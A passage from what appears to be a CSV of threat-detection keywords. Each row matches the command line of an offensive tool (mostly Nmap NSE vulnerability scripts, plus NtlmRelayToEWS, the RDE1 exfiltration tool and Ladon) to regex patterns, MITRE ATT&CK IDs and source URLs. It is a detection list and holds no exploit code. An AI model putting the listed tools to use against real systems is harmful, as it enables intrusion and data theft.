Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-referer-checker.nse*",".{0,1000}\shttp\-referer\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* httprelayserver.py*",".{0,1000}\shttprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "* http-rfi-spider.nse*",".{0,1000}\shttp\-rfi\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-robots.txt.nse*",".{0,1000}\shttp\-robots\.txt\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-robtex-reverse-ip.nse*",".{0,1000}\shttp\-robtex\-reverse\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-robtex-shared-ns.nse*",".{0,1000}\shttp\-robtex\-shared\-ns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *",".{0,1000}\shttps\s\-i\s0\.0\.0\.0\s\-P\s.{0,1000}\s\-k\s.{0,1000}\s\-\-private\-cert\s.{0,1000}\s\-\-public\-cert\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* http-sap-netweaver-leak.nse*",".{0,1000}\shttp\-sap\-netweaver\-leak\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-security-headers.nse*",".{0,1000}\shttp\-security\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-server-header.nse*",".{0,1000}\shttp\-server\-header\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-shellshock.nse*",".{0,1000}\shttp\-shellshock\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-sitemap-generator.nse*",".{0,1000}\shttp\-sitemap\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-slowloris.nse*",".{0,1000}\shttp\-slowloris\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-slowloris-check.nse*",".{0,1000}\shttp\-slowloris\-check\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* HTTPSniffer *",".{0,1000}\sHTTPSniffer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* http-spider-log4shell.nse*",".{0,1000}\shttp\-spider\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* http-sql-injection.nse*",".{0,1000}\shttp\-sql\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* https-redirect.nse*",".{0,1000}\shttps\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-stored-xss.nse*",".{0,1000}\shttp\-stored\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-svn-enum.nse*",".{0,1000}\shttp\-svn\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-svn-info.nse*",".{0,1000}\shttp\-svn\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-tenda-enum.nse*",".{0,1000}\shttp\-tenda\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* http-title.nse*",".{0,1000}\shttp\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-tplink-dir-traversal.nse*",".{0,1000}\shttp\-tplink\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-trace.nse*",".{0,1000}\shttp\-trace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-traceroute.nse*",".{0,1000}\shttp\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-trane-info.nse*",".{0,1000}\shttp\-trane\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-unsafe-output-escaping.nse*",".{0,1000}\shttp\-unsafe\-output\-escaping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-useragent-tester.nse*",".{0,1000}\shttp\-useragent\-tester\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-userdir-enum.nse*",".{0,1000}\shttp\-userdir\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vhosts.nse*",".{0,1000}\shttp\-vhosts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-virustotal.nse*",".{0,1000}\shttp\-virustotal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vlcstreamer-ls.nse*",".{0,1000}\shttp\-vlcstreamer\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vmware-path-vuln.nse*",".{0,1000}\shttp\-vmware\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2006-3392.nse*",".{0,1000}\shttp\-vuln\-cve2006\-3392\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2009-3960.nse*",".{0,1000}\shttp\-vuln\-cve2009\-3960\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2010-0738.nse*",".{0,1000}\shttp\-vuln\-cve2010\-0738\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2010-2861.nse*",".{0,1000}\shttp\-vuln\-cve2010\-2861\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2011-3192.nse*",".{0,1000}\shttp\-vuln\-cve2011\-3192\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2011-3368.nse*",".{0,1000}\shttp\-vuln\-cve2011\-3368\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2012-1823.nse*",".{0,1000}\shttp\-vuln\-cve2012\-1823\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2013-0156.nse*",".{0,1000}\shttp\-vuln\-cve2013\-0156\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2013-6786.nse*",".{0,1000}\shttp\-vuln\-cve2013\-6786\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2013-7091.nse*",".{0,1000}\shttp\-vuln\-cve2013\-7091\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-2126.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2126\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-2127.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2127\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-2128.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2128\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-2129.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2129\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-3704.nse*",".{0,1000}\shttp\-vuln\-cve2014\-3704\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-8877.nse*",".{0,1000}\shttp\-vuln\-cve2014\-8877\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2015-1427.nse*",".{0,1000}\shttp\-vuln\-cve2015\-1427\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2015-1635.nse*",".{0,1000}\shttp\-vuln\-cve2015\-1635\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-1001000.nse*",".{0,1000}\shttp\-vuln\-cve2017\-1001000\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-5638.nse*",".{0,1000}\shttp\-vuln\-cve2017\-5638\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-5689.nse*",".{0,1000}\shttp\-vuln\-cve2017\-5689\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-8917.nse*",".{0,1000}\shttp\-vuln\-cve2017\-8917\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* 